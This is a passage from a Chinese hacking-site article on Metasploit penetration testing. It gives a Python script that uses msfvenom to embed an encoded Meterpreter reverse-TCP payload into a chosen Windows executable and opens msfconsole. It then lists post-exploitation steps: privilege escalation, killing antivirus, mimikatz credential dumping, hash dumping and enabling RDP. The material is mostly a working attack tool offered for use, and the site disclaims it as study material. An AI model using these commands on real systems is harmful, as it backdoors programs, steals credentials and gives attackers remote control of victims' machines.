欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

基于MetaSploit内网穿透渗透测试

来源:本站整理 作者:佚名 时间:2018-03-08 TAG: 我要投稿
        port=raw_input('PORT:').strip()
        code_time=raw_input('Code Times(3):').strip()
        if len(source_path)!=0 and len(port)!=0 and len(port)!=0:
            if len(code_time)==0:
                code_time='3'
   
        print(
            '''
        ***************************************
            Source_path:%s\n
            IP:%s\n
            PORT:%s\n
            Code Times:%s\n
            '''
        )%(source_path,host,port,code_time)
   
        #confirm info
        flag=raw_input('(Y/N) ').strip()
        if flag=='Y' or flag=='y':
            print'''
            [+]Start Prepare attack. Open all tools. 3.2.1....
            '''
            cmd_line='msfvenom -a x86 --platform windows -x %s -k -p windows/meterpreter/reverse_tcp lhost=%s lport=%s -e x86/shikata_ga_nai -i %s -b "\\x00" -f exe -o /Users/steven/Desktop/X.exe'%(source_path,host,port,code_time)
            # output = os.popen(cmd_line, 'r')
            # print output.read()
            os.system(cmd_line)
   
            #Open new terminal :Msfconsole
            os.system('open -a Terminal.app msfconsole.sh')
   
            print'''
        ***************************************
            Open msfconsole....
            Open browser.Url:http://www.objectif-securite.ch/en/ophcrack.php
           
            1.getuid\getsystem
            2.background
            3.use exploit/windows/local/ask
              set session 1
              exploit
            (i.run killav)
            4.load mimikatz(msv / kerberos / wdigest / livessp)
            5.run post/windows/gather/smart_hashdump
            6.run post/windows/manage/enable_rdp
           
            '''
            # webbrowser.open("http://www.objectif-securite.ch/en/ophcrack.php")
            # webbrowser.open("https://www.jianshu.com/p/6535203977c4")
            # webbrowser.open("https://natapp.cn")
            break
        else:
            continue
效果如下:

 
这次渗透只是采用了非常传统的payload进行测试,集成脚本也没有优化都是随手撸出来一个。在脚本上肯定还有优化的地方和潜力,payload也可以多添加进行选择。以上都在日常无聊把玩中顺手弄的,如有不足还要多多指教。
 

上一页  [1] [2] 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载